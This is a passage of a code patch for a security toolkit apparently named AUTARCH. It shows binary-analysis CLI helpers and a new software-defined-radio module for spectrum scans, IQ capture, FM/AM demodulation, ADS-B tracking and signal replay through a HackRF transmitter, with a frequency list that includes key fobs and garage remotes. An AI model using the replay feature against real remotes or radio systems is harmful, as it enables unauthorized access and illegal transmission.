        return
    section = self._prompt("Section [.text]: ") or '.text'
    raw_count = self._prompt("Instruction count [50]: ") or '50'
    try:
        count = int(raw_count)
    except ValueError:
        count = 50

    results = self.disassemble_file(filepath, section=section, count=count)
    if results and 'error' in results[0]:
        self.print_status(results[0]['error'], 'error')
        return
    print(f"\n{Colors.CYAN}{'Address':<14} {'Bytes':<24} {'Mnemonic':<10} {'Operands'}{Colors.RESET}")
    print(f"{'-' * 70}")
    for inst in results:
        print(f" {inst['address']:<12} {inst.get('bytes_hex', ''):<22} "
              f"{Colors.CYAN}{inst['mnemonic']:<10}{Colors.RESET} {inst.get('op_str', '')}")

def cli_yara_scan(self):
    """Interactive wrapper around yara_scan."""
    filepath = self._prompt("Enter file path to scan: ")
    if not filepath:
        return
    rules_path = self._prompt("YARA rules file (or Enter for all): ") or None
    result = self.yara_scan(filepath, rules_path=rules_path)
    if 'error' in result and result['error']:
        self.print_status(result['error'], 'error')
    if result.get('matches'):
        print(f"\n {Colors.RED}Matches: {result['total']}{Colors.RESET}")
        for m in result['matches']:
            print(f"   Rule: {m['rule']}")
            # Show at most five string hits per rule.
            for s in m.get('strings', [])[:5]:
                print(f"     0x{s.get('offset', 0):08x}: {s.get('identifier', '')} = {s.get('data', '')}")
    else:
        self.print_status("No matches found", "info")

def cli_hex_dump(self):
    """Interactive wrapper around hex_dump (offset/length accept 0x notation)."""
    filepath = self._prompt("Enter file path: ")
    if not filepath:
        return
    raw_offset = self._prompt("Offset [0]: ") or '0'
    raw_length = self._prompt("Length [256]: ") or '256'
    try:
        offset = int(raw_offset, 0)
        length = int(raw_length, 0)
    except ValueError:
        self.print_status("Invalid offset or length", "error")
        return
    result = self.hex_dump(filepath, offset, length)
    if 'error' in result:
        self.print_status(result['error'], 'error')
        return
    print(f"\n{Colors.CYAN}{result['text']}{Colors.RESET}")

def cli_detect_packer(self):
    """Interactive wrapper around detect_packer."""
    filepath = self._prompt("Enter file path: ")
    if not filepath:
        return
    result = self.detect_packer(filepath)
    if 'error' in result:
        self.print_status(result['error'], 'error')
        return
    if result['detected']:
        print(f"\n {Colors.RED}Packer(s) Detected:{Colors.RESET}")
        for d in result['detections']:
            print(f"   {d['packer']} — confidence {d['confidence']}%")
            print(f"     {d['description']}")
            for e in d.get('evidence', []):
                print(f"       {e}")
    else:
        self.print_status("No packer detected", "success")
        print(f"   Entropy: {result.get('overall_entropy', 0):.4f}")

def cli_compare(self):
    """Interactive wrapper around compare_binaries."""
    file1 = self._prompt("First file: ")
    file2 = self._prompt("Second file: ")
    if not file1 or not file2:
        return
    result = self.compare_binaries(file1, file2)
    if 'error' in result:
        self.print_status(result['error'], 'error')
        return
    f1, f2 = result['file1'], result['file2']
    print(f"\n{Colors.CYAN}{'=' * 60}{Colors.RESET}")
    print(f" File 1: {f1['name']} ({f1['size']:,} bytes, entropy {f1['entropy']:.2f})")
    print(f" File 2: {f2['name']} ({f2['size']:,} bytes, entropy {f2['entropy']:.2f})")
    if result['identical']:
        self.print_status("Files are identical", "success")
    else:
        print(f"\n {Colors.YELLOW}Different bytes: {result['diff_bytes']:,} ({result['diff_percentage']}%){Colors.RESET}")
        print(f" Diff regions: {result['diff_regions_total']}")
        for sd in result.get('section_diffs', []):
            status_color = Colors.RED if sd['status'] != 'unchanged' else Colors.GREEN
            print(f"   {sd['name']:16} {status_color}{sd['status']}{Colors.RESET}")

def run(self):
    """Main interactive loop: show menu, dispatch, pause after each action."""
    handlers = {
        "1": self.cli_analyze,
        "2": self.cli_disassemble,
        "3": self.cli_yara_scan,
        "4": self.cli_hex_dump,
        "5": self.cli_detect_packer,
        "6": self.cli_compare,
    }
    while True:
        self.show_menu()
        try:
            choice = input(f"{Colors.WHITE} Select: {Colors.RESET}").strip()
            if choice == "0":
                break
            handler = handlers.get(choice)
            if handler:
                handler()
                input(f"\n{Colors.WHITE} Press Enter to continue...{Colors.RESET}")
        except (EOFError, KeyboardInterrupt):
            break


# ── Singleton ────────────────────────────────────────────────────────────────

_instance = None

def get_reverse_eng() -> ReverseEngineer:
    """Return the process-wide ReverseEngineer, creating it on first use."""
    global _instance
    if _instance is None:
        _instance = ReverseEngineer()
    return _instance
run(): + get_reverse_eng().run() + + +if __name__ == "__main__": + run() diff --git a/modules/sdr_tools.py b/modules/sdr_tools.py new file mode 100644 index 0000000..3b3201c --- /dev/null +++ b/modules/sdr_tools.py @@ -0,0 +1,2091 @@ +"""AUTARCH SDR / RF Tools + +Software-defined radio integration for spectrum analysis, signal capture/replay, +ADS-B tracking, FM/AM demodulation, and GPS spoofing detection. +Supports HackRF, RTL-SDR, and compatible devices. +""" + +DESCRIPTION = "SDR/RF — spectrum analysis, signal capture & replay" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "analyze" + +import os +import re +import json +import time +import shutil +import struct +import subprocess +import threading +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── Common Frequencies Reference ───────────────────────────────────────────── + +COMMON_FREQUENCIES = { + 'FM Broadcast': { + 'range': '87.5-108 MHz', + 'entries': [ + {'freq': 87500000, 'name': 'FM Band Start'}, + {'freq': 92100000, 'name': 'FM Example (92.1)'}, + {'freq': 97500000, 'name': 'FM Example (97.5)'}, + {'freq': 108000000, 'name': 'FM Band End'}, + ], + }, + 'Aviation': { + 'range': '108-137 MHz', + 'entries': [ + {'freq': 108000000, 'name': 'VOR/ILS Start'}, + {'freq': 118000000, 'name': 'Air Traffic Control Start'}, + {'freq': 121500000, 'name': 'Emergency / Guard'}, + {'freq': 123450000, 'name': 'Air-to-Air (Unicom)'}, + {'freq': 128825000, 'name': 'Eurocontrol UAC'}, + {'freq': 132000000, 'name': 'Approach Control'}, + {'freq': 136975000, 'name': 'ACARS'}, + ], + }, + 'Marine VHF': { + 'range': '156-162 MHz', + 'entries': [ + {'freq': 156000000, 'name': 'Ch 0 — Coast Guard'}, + {'freq': 156300000, 'name': 'Ch 6 — Intership Safety'}, 
+ {'freq': 156525000, 'name': 'Ch 70 — DSC Distress'}, + {'freq': 156800000, 'name': 'Ch 16 — Distress / Calling'}, + {'freq': 161975000, 'name': 'AIS 1'}, + {'freq': 162025000, 'name': 'AIS 2'}, + ], + }, + 'Weather': { + 'range': '162.4-162.55 MHz', + 'entries': [ + {'freq': 162400000, 'name': 'NOAA WX1'}, + {'freq': 162425000, 'name': 'NOAA WX2'}, + {'freq': 162450000, 'name': 'NOAA WX3'}, + {'freq': 162475000, 'name': 'NOAA WX4'}, + {'freq': 162500000, 'name': 'NOAA WX5'}, + {'freq': 162525000, 'name': 'NOAA WX6'}, + {'freq': 162550000, 'name': 'NOAA WX7'}, + ], + }, + 'ISM 433': { + 'range': '433-434 MHz', + 'notes': 'Garage doors, key fobs, weather stations, tire pressure sensors', + 'entries': [ + {'freq': 433050000, 'name': 'ISM 433.05 — Key Fobs'}, + {'freq': 433420000, 'name': 'ISM 433.42 — TPMS'}, + {'freq': 433920000, 'name': 'ISM 433.92 — Common Remote'}, + {'freq': 434000000, 'name': 'ISM Band End'}, + ], + }, + 'ISM 915': { + 'range': '902-928 MHz', + 'notes': 'LoRa, smart meters, Z-Wave, RFID', + 'entries': [ + {'freq': 902000000, 'name': 'ISM 902 Band Start'}, + {'freq': 903900000, 'name': 'LoRa Uplink Start'}, + {'freq': 915000000, 'name': 'ISM Center'}, + {'freq': 923300000, 'name': 'LoRa Downlink Start'}, + {'freq': 928000000, 'name': 'ISM 928 Band End'}, + ], + }, + 'Pager': { + 'range': '929-932 MHz', + 'entries': [ + {'freq': 929000000, 'name': 'Pager Band Start'}, + {'freq': 931000000, 'name': 'Common Pager Freq'}, + {'freq': 931862500, 'name': 'FLEX Pager'}, + ], + }, + 'ADS-B': { + 'range': '1090 MHz', + 'entries': [ + {'freq': 978000000, 'name': 'UAT (978 MHz) — GA'}, + {'freq': 1090000000, 'name': 'Mode S Extended Squitter'}, + ], + }, + 'GPS L1': { + 'range': '1575.42 MHz', + 'entries': [ + {'freq': 1575420000, 'name': 'GPS L1 C/A'}, + {'freq': 1176450000, 'name': 'GPS L5'}, + {'freq': 1227600000, 'name': 'GPS L2'}, + {'freq': 1602000000, 'name': 'GLONASS L1'}, + ], + }, + 'WiFi 2.4': { + 'range': '2.4-2.5 GHz', + 'entries': [ + 
{'freq': 2412000000, 'name': 'Channel 1'}, + {'freq': 2437000000, 'name': 'Channel 6'}, + {'freq': 2462000000, 'name': 'Channel 11'}, + ], + }, + 'Public Safety': { + 'range': '150-174 / 450-470 MHz', + 'entries': [ + {'freq': 155475000, 'name': 'Police Mutual Aid'}, + {'freq': 155520000, 'name': 'Fire Mutual Aid'}, + {'freq': 156750000, 'name': 'Search & Rescue'}, + {'freq': 460025000, 'name': 'Police UHF Common'}, + {'freq': 462562500, 'name': 'FRS Channel 1'}, + {'freq': 462675000, 'name': 'GMRS Repeater'}, + ], + }, + 'Amateur': { + 'range': 'Various bands', + 'entries': [ + {'freq': 144000000, 'name': '2m Band Start'}, + {'freq': 146520000, 'name': '2m Calling Freq'}, + {'freq': 146940000, 'name': '2m Repeater'}, + {'freq': 440000000, 'name': '70cm Band Start'}, + {'freq': 446000000, 'name': '70cm Calling Freq'}, + ], + }, +} + + +# ── Drone RF Frequency Reference ───────────────────────────────────────────── + +DRONE_FREQUENCIES = { + 'dji_control_2g': {'center': 2437000000, 'bandwidth': 40000000, 'desc': 'DJI OcuSync 2.4 GHz Control'}, + 'dji_control_5g': {'center': 5787000000, 'bandwidth': 80000000, 'desc': 'DJI OcuSync 5.8 GHz Control'}, + 'fpv_video_5g': {'center': 5800000000, 'bandwidth': 200000000, 'desc': 'Analog FPV 5.8 GHz Video'}, + 'crossfire_900': {'center': 915000000, 'bandwidth': 26000000, 'desc': 'TBS Crossfire 900 MHz'}, + 'elrs_2g': {'center': 2440000000, 'bandwidth': 80000000, 'desc': 'ExpressLRS 2.4 GHz'}, + 'elrs_900': {'center': 915000000, 'bandwidth': 26000000, 'desc': 'ExpressLRS 900 MHz'}, + 'analog_video_12g': {'center': 1280000000, 'bandwidth': 100000000, 'desc': '1.2 GHz Analog Video'}, + 'telemetry_433': {'center': 433000000, 'bandwidth': 2000000, 'desc': '433 MHz Telemetry'}, +} + +FPV_5G_CHANNELS = { + 'R1': 5658, 'R2': 5695, 'R3': 5732, 'R4': 5769, 'R5': 5806, 'R6': 5843, 'R7': 5880, 'R8': 5917, + 'F1': 5740, 'F2': 5760, 'F3': 5780, 'F4': 5800, 'F5': 5820, 'F6': 5840, 'F7': 5860, 'F8': 5880, + 'E1': 5705, 'E2': 5685, 'E3': 5665, 
'E4': 5645, 'E5': 5885, 'E6': 5905, 'E7': 5925, 'E8': 5945, + 'A1': 5865, 'A2': 5845, 'A3': 5825, 'A4': 5805, 'A5': 5785, 'A6': 5765, 'A7': 5745, 'A8': 5725, +} + + +# ── SDR Tools Class ────────────────────────────────────────────────────────── + +class SDRTools: + """Software-defined radio integration for the AUTARCH platform.""" + + _instance = None + + def __init__(self): + self._sdr_dir = Path(str(get_data_dir())) / 'sdr' + self._sdr_dir.mkdir(parents=True, exist_ok=True) + self._recordings_dir = self._sdr_dir / 'recordings' + self._recordings_dir.mkdir(parents=True, exist_ok=True) + self._metadata_file = self._sdr_dir / 'recordings_meta.json' + self._capture_process: Optional[subprocess.Popen] = None + self._capture_lock = threading.Lock() + self._capture_info: Dict[str, Any] = {} + self._adsb_process: Optional[subprocess.Popen] = None + self._adsb_thread: Optional[threading.Thread] = None + self._adsb_running = False + self._adsb_aircraft: Dict[str, Dict[str, Any]] = {} + self._adsb_lock = threading.Lock() + # Drone detection state + self._drone_process: Optional[subprocess.Popen] = None + self._drone_thread: Optional[threading.Thread] = None + self._drone_running = False + self._drone_detections: List[Dict[str, Any]] = [] + self._drone_lock = threading.Lock() + self._drone_detections_file = self._sdr_dir / 'drone_detections.json' + self._load_drone_detections() + self._load_metadata() + + def _load_metadata(self): + """Load recording metadata from disk.""" + try: + if self._metadata_file.exists(): + with open(self._metadata_file, 'r') as f: + self._metadata = json.load(f) + else: + self._metadata = [] + except Exception: + self._metadata = [] + + def _save_metadata(self): + """Persist recording metadata to disk.""" + try: + with open(self._metadata_file, 'w') as f: + json.dump(self._metadata, f, indent=2) + except Exception: + pass + + def _run_cmd(self, cmd: str, timeout: int = 30) -> tuple: + """Run a shell command and return (success, stdout).""" + try: 
+ result = subprocess.run( + cmd, shell=True, capture_output=True, text=True, timeout=timeout + ) + return result.returncode == 0, result.stdout.strip() + except subprocess.TimeoutExpired: + return False, 'Command timed out' + except Exception as e: + return False, str(e) + + # ── Device Detection ───────────────────────────────────────────────────── + + def detect_devices(self) -> List[Dict[str, Any]]: + """Detect connected SDR devices (RTL-SDR, HackRF).""" + devices = [] + + # Check RTL-SDR + rtl_test = find_tool('rtl_test') + if rtl_test: + try: + result = subprocess.run( + [rtl_test, '-t'], + capture_output=True, text=True, timeout=8 + ) + output = result.stdout + result.stderr + # Look for "Found N device(s)" pattern + match = re.search(r'Found\s+(\d+)\s+device', output) + if match: + count = int(match.group(1)) + if count > 0: + # Parse each device + for m in re.finditer( + r'(\d+):\s+(.+?)(?:,\s*(.+?))?\s*(?:SN:\s*(\S+))?', + output + ): + devices.append({ + 'type': 'rtl-sdr', + 'index': int(m.group(1)), + 'name': m.group(2).strip(), + 'serial': m.group(4) or 'N/A', + 'status': 'available', + 'capabilities': ['rx'], + }) + # If regex didn't match specifics, add generic entry + if not devices: + for i in range(count): + devices.append({ + 'type': 'rtl-sdr', + 'index': i, + 'name': 'RTL-SDR Device', + 'serial': 'N/A', + 'status': 'available', + 'capabilities': ['rx'], + }) + elif 'No supported devices' not in output: + # rtl_test ran but gave unexpected output + pass + except subprocess.TimeoutExpired: + pass + except Exception: + pass + else: + devices.append({ + 'type': 'rtl-sdr', + 'name': 'RTL-SDR', + 'serial': 'N/A', + 'status': 'tool_missing', + 'note': 'rtl_test not found — install rtl-sdr package', + 'capabilities': [], + }) + + # Check HackRF + hackrf_info = find_tool('hackrf_info') + if hackrf_info: + try: + result = subprocess.run( + [hackrf_info], + capture_output=True, text=True, timeout=8 + ) + output = result.stdout + result.stderr + if 'Serial 
number' in output: + serials = re.findall(r'Serial number:\s*(\S+)', output) + fw_versions = re.findall(r'Firmware Version:\s*(.+)', output) + for idx, serial in enumerate(serials): + devices.append({ + 'type': 'hackrf', + 'index': idx, + 'name': 'HackRF One', + 'serial': serial, + 'firmware': fw_versions[idx].strip() if idx < len(fw_versions) else 'Unknown', + 'status': 'available', + 'capabilities': ['rx', 'tx'], + }) + elif 'No HackRF' in output or result.returncode != 0: + pass + except subprocess.TimeoutExpired: + pass + except Exception: + pass + else: + devices.append({ + 'type': 'hackrf', + 'name': 'HackRF', + 'serial': 'N/A', + 'status': 'tool_missing', + 'note': 'hackrf_info not found — install hackrf package', + 'capabilities': [], + }) + + return devices + + # ── Spectrum Scanning ──────────────────────────────────────────────────── + + def scan_spectrum(self, device: str = 'rtl', freq_start: int = 88000000, + freq_end: int = 108000000, step: Optional[int] = None, + gain: Optional[int] = None, duration: int = 5) -> Dict[str, Any]: + """Sweep a frequency range and collect signal strength at each step. + + Returns a dict with 'data' (list of {freq, power_db}) and scan metadata. 
+ """ + if step is None: + # Auto-calculate step based on range + span = freq_end - freq_start + if span <= 1000000: + step = 10000 # 10 kHz steps for narrow scans + elif span <= 10000000: + step = 100000 # 100 kHz steps + elif span <= 100000000: + step = 250000 # 250 kHz steps + else: + step = 1000000 # 1 MHz steps for wide scans + + results = {'data': [], 'device': device, 'freq_start': freq_start, + 'freq_end': freq_end, 'step': step, 'timestamp': datetime.now(timezone.utc).isoformat()} + + if device == 'hackrf': + return self._scan_hackrf(freq_start, freq_end, step, gain, duration, results) + else: + return self._scan_rtl(freq_start, freq_end, step, gain, duration, results) + + def _scan_rtl(self, freq_start, freq_end, step, gain, duration, results): + """Spectrum scan using rtl_power.""" + rtl_power = find_tool('rtl_power') + if not rtl_power: + results['error'] = 'rtl_power not found — install rtl-sdr package' + return results + + # rtl_power output file + outfile = self._sdr_dir / 'spectrum_scan.csv' + if outfile.exists(): + outfile.unlink() + + # Build command: rtl_power -f :: -g -i -1 + cmd = [rtl_power, + '-f', f'{freq_start}:{freq_end}:{step}', + '-i', str(duration), + '-1'] # single sweep + if gain is not None: + cmd.extend(['-g', str(gain)]) + cmd.append(str(outfile)) + + try: + proc = subprocess.run(cmd, capture_output=True, text=True, + timeout=duration + 30) + if not outfile.exists(): + results['error'] = 'No output from rtl_power: ' + (proc.stderr or proc.stdout) + return results + + # Parse CSV: date,time,Hz_low,Hz_high,Hz_step,samples,dB,dB,... 
+ with open(outfile, 'r') as f: + for line in f: + line = line.strip() + if not line: + continue + parts = line.split(',') + if len(parts) < 7: + continue + try: + hz_low = float(parts[2]) + hz_step = float(parts[4]) + db_values = [float(x) for x in parts[6:] if x.strip()] + for i, db in enumerate(db_values): + freq = hz_low + (i * hz_step) + results['data'].append({ + 'freq': int(freq), + 'power_db': round(db, 2) + }) + except (ValueError, IndexError): + continue + + results['points'] = len(results['data']) + except subprocess.TimeoutExpired: + results['error'] = 'Spectrum scan timed out' + except Exception as e: + results['error'] = str(e) + + return results + + def _scan_hackrf(self, freq_start, freq_end, step, gain, duration, results): + """Spectrum scan using hackrf_sweep.""" + hackrf_sweep = find_tool('hackrf_sweep') + if not hackrf_sweep: + results['error'] = 'hackrf_sweep not found — install hackrf package' + return results + + # Convert Hz to MHz for hackrf_sweep + f_start_mhz = freq_start // 1000000 + f_end_mhz = max(freq_end // 1000000, f_start_mhz + 1) + + cmd = [hackrf_sweep, + '-f', f'{f_start_mhz}:{f_end_mhz}', + '-n', '8192', # FFT bin width + '-w', str(step)] + if gain is not None: + cmd.extend(['-l', str(gain)]) # LNA gain + + try: + proc = subprocess.run(cmd, capture_output=True, text=True, + timeout=duration + 30) + output = proc.stdout + # Parse hackrf_sweep output: date,time,Hz_low,Hz_high,Hz_bin_width,num_samples,dB... 
+ for line in output.splitlines(): + line = line.strip() + if not line or line.startswith('#'): + continue + parts = line.split(',') + if len(parts) < 7: + continue + try: + hz_low = float(parts[2].strip()) + hz_bin_width = float(parts[4].strip()) + db_values = [float(x.strip()) for x in parts[6:] if x.strip()] + for i, db in enumerate(db_values): + freq = hz_low + (i * hz_bin_width) + if freq_start <= freq <= freq_end: + results['data'].append({ + 'freq': int(freq), + 'power_db': round(db, 2) + }) + except (ValueError, IndexError): + continue + + results['points'] = len(results['data']) + except subprocess.TimeoutExpired: + results['error'] = 'HackRF sweep timed out' + except Exception as e: + results['error'] = str(e) + + return results + + # ── Signal Capture ─────────────────────────────────────────────────────── + + def start_capture(self, device: str = 'rtl', frequency: int = 100000000, + sample_rate: int = 2048000, gain: str = 'auto', + duration: int = 10, output: Optional[str] = None) -> Dict[str, Any]: + """Capture raw IQ samples to a file.""" + with self._capture_lock: + if self._capture_process is not None and self._capture_process.poll() is None: + return {'error': 'Capture already in progress', 'capturing': True} + + ts = datetime.now(timezone.utc).strftime('%Y%m%d_%H%M%S') + freq_mhz = frequency / 1000000 + filename = output or f'capture_{freq_mhz:.3f}MHz_{ts}.raw' + filepath = self._recordings_dir / filename + + if device == 'hackrf': + tool = find_tool('hackrf_transfer') + if not tool: + return {'error': 'hackrf_transfer not found — install hackrf package'} + cmd = [tool, + '-r', str(filepath), + '-f', str(frequency), + '-s', str(sample_rate), + '-n', str(sample_rate * duration)] + if gain != 'auto': + cmd.extend(['-l', str(gain)]) + else: + tool = find_tool('rtl_sdr') + if not tool: + return {'error': 'rtl_sdr not found — install rtl-sdr package'} + cmd = [tool, + '-f', str(frequency), + '-s', str(sample_rate), + '-n', str(sample_rate * duration)] 
+ if gain != 'auto': + cmd.extend(['-g', str(gain)]) + cmd.append(str(filepath)) + + try: + self._capture_process = subprocess.Popen( + cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + self._capture_info = { + 'file': str(filepath), + 'filename': filename, + 'device': device, + 'frequency': frequency, + 'sample_rate': sample_rate, + 'gain': gain, + 'duration': duration, + 'started': datetime.now(timezone.utc).isoformat(), + 'pid': self._capture_process.pid, + } + + # Auto-stop thread + def _auto_stop(): + try: + self._capture_process.wait(timeout=duration + 5) + except subprocess.TimeoutExpired: + self._capture_process.terminate() + finally: + self._finalize_capture() + + t = threading.Thread(target=_auto_stop, daemon=True) + t.start() + + return { + 'status': 'capturing', + 'file': filename, + 'frequency': frequency, + 'sample_rate': sample_rate, + 'duration': duration, + 'device': device, + } + except Exception as e: + self._capture_process = None + return {'error': f'Failed to start capture: {e}'} + + def _finalize_capture(self): + """Save metadata for a completed capture.""" + with self._capture_lock: + info = self._capture_info.copy() + filepath = Path(info.get('file', '')) + if filepath.exists(): + size = filepath.stat().st_size + info['size'] = size + info['size_human'] = self._human_size(size) + # Calculate actual duration from file size + sr = info.get('sample_rate', 2048000) + # IQ samples: 2 bytes per sample (8-bit I + 8-bit Q) for RTL-SDR + bytes_per_sample = 2 + actual_samples = size / bytes_per_sample + info['actual_duration'] = round(actual_samples / sr, 2) if sr > 0 else 0 + info['completed'] = datetime.now(timezone.utc).isoformat() + self._metadata.append(info) + self._save_metadata() + self._capture_process = None + self._capture_info = {} + + def stop_capture(self) -> Dict[str, Any]: + """Stop an active capture.""" + with self._capture_lock: + if self._capture_process is None or self._capture_process.poll() is not None: + return 
{'status': 'no_capture', 'message': 'No capture is running'} + try: + self._capture_process.terminate() + self._capture_process.wait(timeout=5) + except subprocess.TimeoutExpired: + self._capture_process.kill() + except Exception: + pass + self._finalize_capture() + return {'status': 'stopped', 'message': 'Capture stopped'} + + def is_capturing(self) -> bool: + """Check if a capture is currently running.""" + with self._capture_lock: + return (self._capture_process is not None + and self._capture_process.poll() is None) + + # ── Replay ─────────────────────────────────────────────────────────────── + + def replay_signal(self, file_path: str, frequency: int = 100000000, + sample_rate: int = 2048000, gain: int = 47) -> Dict[str, Any]: + """Transmit a captured signal via HackRF (TX only on HackRF).""" + hackrf = find_tool('hackrf_transfer') + if not hackrf: + return {'error': 'hackrf_transfer not found — install hackrf package'} + + # Resolve file path + fpath = Path(file_path) + if not fpath.is_absolute(): + fpath = self._recordings_dir / file_path + if not fpath.exists(): + return {'error': f'Recording file not found: {file_path}'} + + cmd = [hackrf, + '-t', str(fpath), + '-f', str(frequency), + '-s', str(sample_rate), + '-x', str(gain)] # -x = TX VGA gain + + try: + result = subprocess.run(cmd, capture_output=True, text=True, timeout=120) + if result.returncode == 0: + return { + 'status': 'completed', + 'message': f'Replayed {fpath.name} at {frequency/1e6:.3f} MHz', + 'file': fpath.name, + 'frequency': frequency, + } + else: + return { + 'error': f'Replay failed: {result.stderr or result.stdout}', + 'returncode': result.returncode, + } + except subprocess.TimeoutExpired: + return {'error': 'Replay timed out'} + except Exception as e: + return {'error': str(e)} + + # ── Recordings Management ──────────────────────────────────────────────── + + def list_recordings(self) -> List[Dict[str, Any]]: + """List all saved recordings with metadata.""" + self._load_metadata() 
+ recordings = [] + # Include metadata-tracked recordings + for meta in self._metadata: + filepath = Path(meta.get('file', '')) + if filepath.exists(): + meta_copy = meta.copy() + meta_copy['exists'] = True + recordings.append(meta_copy) + else: + meta_copy = meta.copy() + meta_copy['exists'] = False + recordings.append(meta_copy) + + # Also check for un-tracked files in the recordings directory + tracked_files = {Path(m.get('file', '')).name for m in self._metadata} + for f in self._recordings_dir.iterdir(): + if f.is_file() and f.suffix in ('.raw', '.iq', '.wav', '.cu8', '.cs8'): + if f.name not in tracked_files: + stat = f.stat() + recordings.append({ + 'file': str(f), + 'filename': f.name, + 'size': stat.st_size, + 'size_human': self._human_size(stat.st_size), + 'device': 'unknown', + 'frequency': 0, + 'sample_rate': 0, + 'completed': datetime.fromtimestamp( + stat.st_mtime, tz=timezone.utc + ).isoformat(), + 'exists': True, + 'untracked': True, + }) + + # Sort by completed time, newest first + recordings.sort(key=lambda r: r.get('completed', ''), reverse=True) + return recordings + + def delete_recording(self, recording_id: str) -> Dict[str, Any]: + """Delete a recording by filename.""" + # Try to match against metadata + self._load_metadata() + new_meta = [] + deleted = False + for meta in self._metadata: + fname = Path(meta.get('file', '')).name + if fname == recording_id or meta.get('filename') == recording_id: + filepath = Path(meta.get('file', '')) + if filepath.exists(): + try: + filepath.unlink() + except Exception: + pass + deleted = True + else: + new_meta.append(meta) + + if deleted: + self._metadata = new_meta + self._save_metadata() + return {'status': 'deleted', 'file': recording_id} + + # Try direct file match in recordings directory + fpath = self._recordings_dir / recording_id + if fpath.exists(): + try: + fpath.unlink() + return {'status': 'deleted', 'file': recording_id} + except Exception as e: + return {'error': f'Could not delete: {e}'} + 
+ return {'error': f'Recording not found: {recording_id}'} + + # ── Demodulation ───────────────────────────────────────────────────────── + + def demodulate_fm(self, file_path: str, frequency: Optional[int] = None) -> Dict[str, Any]: + """FM demodulate captured IQ data to audio.""" + fpath = self._resolve_recording(file_path) + if not fpath: + return {'error': f'Recording file not found: {file_path}'} + + outfile = fpath.with_suffix('.fm.wav') + + # Method 1: Use rtl_fm pipeline (if file was captured with rtl_sdr) + sox = find_tool('sox') + rtl_fm = find_tool('rtl_fm') + + # We'll use a Python-based approach: read raw IQ, apply FM demod, write WAV + try: + raw = fpath.read_bytes() + if len(raw) < 1024: + return {'error': 'File too small to demodulate'} + + # Assume unsigned 8-bit IQ (RTL-SDR default) + samples = [] + for i in range(0, len(raw) - 1, 2): + i_val = (raw[i] - 127.5) / 127.5 + q_val = (raw[i + 1] - 127.5) / 127.5 + samples.append(complex(i_val, q_val)) + + if len(samples) < 2: + return {'error': 'Not enough samples for demodulation'} + + # FM demodulation: phase difference between consecutive samples + audio = [] + for i in range(1, len(samples)): + conj = complex(samples[i - 1].real, -samples[i - 1].imag) + product = samples[i] * conj + import math + phase = math.atan2(product.imag, product.real) + audio.append(phase) + + # Downsample to ~48 kHz audio + # Assume 2.048 MHz sample rate → decimate by 42 for ~48.7 kHz + decimation = 42 + decimated = [audio[i] for i in range(0, len(audio), decimation)] + + # Normalize to 16-bit PCM + if not decimated: + return {'error': 'Demodulation produced no audio samples'} + max_val = max(abs(s) for s in decimated) or 1.0 + pcm = [int((s / max_val) * 32000) for s in decimated] + + # Write WAV file + import wave + with wave.open(str(outfile), 'w') as wav: + wav.setnchannels(1) + wav.setsampwidth(2) + wav.setframerate(48000) + wav.writeframes(struct.pack(f'<{len(pcm)}h', *pcm)) + + return { + 'status': 'completed', + 
'output': str(outfile), + 'filename': outfile.name, + 'samples': len(pcm), + 'duration': round(len(pcm) / 48000, 2), + 'mode': 'FM', + } + except Exception as e: + return {'error': f'FM demodulation failed: {e}'} + + def demodulate_am(self, file_path: str, frequency: Optional[int] = None) -> Dict[str, Any]: + """AM demodulate captured IQ data to audio.""" + fpath = self._resolve_recording(file_path) + if not fpath: + return {'error': f'Recording file not found: {file_path}'} + + outfile = fpath.with_suffix('.am.wav') + + try: + raw = fpath.read_bytes() + if len(raw) < 1024: + return {'error': 'File too small to demodulate'} + + # AM demodulation: envelope detection (magnitude of IQ samples) + audio = [] + for i in range(0, len(raw) - 1, 2): + i_val = (raw[i] - 127.5) / 127.5 + q_val = (raw[i + 1] - 127.5) / 127.5 + import math + magnitude = math.sqrt(i_val * i_val + q_val * q_val) + audio.append(magnitude) + + if not audio: + return {'error': 'Not enough samples for AM demodulation'} + + # Remove DC offset + mean_val = sum(audio) / len(audio) + audio = [s - mean_val for s in audio] + + # Downsample to ~48 kHz + decimation = 42 + decimated = [audio[i] for i in range(0, len(audio), decimation)] + + # Normalize to 16-bit PCM + if not decimated: + return {'error': 'Demodulation produced no audio samples'} + max_val = max(abs(s) for s in decimated) or 1.0 + pcm = [int((s / max_val) * 32000) for s in decimated] + + # Write WAV + import wave + with wave.open(str(outfile), 'w') as wav: + wav.setnchannels(1) + wav.setsampwidth(2) + wav.setframerate(48000) + wav.writeframes(struct.pack(f'<{len(pcm)}h', *pcm)) + + return { + 'status': 'completed', + 'output': str(outfile), + 'filename': outfile.name, + 'samples': len(pcm), + 'duration': round(len(pcm) / 48000, 2), + 'mode': 'AM', + } + except Exception as e: + return {'error': f'AM demodulation failed: {e}'} + + # ── ADS-B Tracking ─────────────────────────────────────────────────────── + + def start_adsb(self, device: str = 
'rtl') -> Dict[str, Any]: + """Start ADS-B aircraft tracking (1090 MHz).""" + with self._adsb_lock: + if self._adsb_running: + return {'status': 'already_running', 'message': 'ADS-B tracking is already active'} + + # Try dump1090 first, then rtl_adsb + dump1090 = find_tool('dump1090') + rtl_adsb = find_tool('rtl_adsb') + tool = dump1090 or rtl_adsb + + if not tool: + return {'error': 'No ADS-B tool found — install dump1090 or rtl-sdr (rtl_adsb)'} + + try: + if dump1090: + cmd = [dump1090, '--raw', '--net-only', '--quiet'] + else: + cmd = [rtl_adsb] + + self._adsb_process = subprocess.Popen( + cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True + ) + self._adsb_running = True + self._adsb_aircraft.clear() + + # Background thread to parse output + self._adsb_thread = threading.Thread( + target=self._adsb_reader, daemon=True + ) + self._adsb_thread.start() + + return { + 'status': 'started', + 'tool': Path(tool).name, + 'message': f'ADS-B tracking started with {Path(tool).name}', + } + except Exception as e: + self._adsb_running = False + return {'error': f'Failed to start ADS-B: {e}'} + + def _adsb_reader(self): + """Background thread to read and parse ADS-B output.""" + try: + while self._adsb_running and self._adsb_process: + line = self._adsb_process.stdout.readline() + if not line: + if self._adsb_process.poll() is not None: + break + continue + line = line.strip() + if not line: + continue + self._parse_adsb_message(line) + except Exception: + pass + finally: + self._adsb_running = False + + def 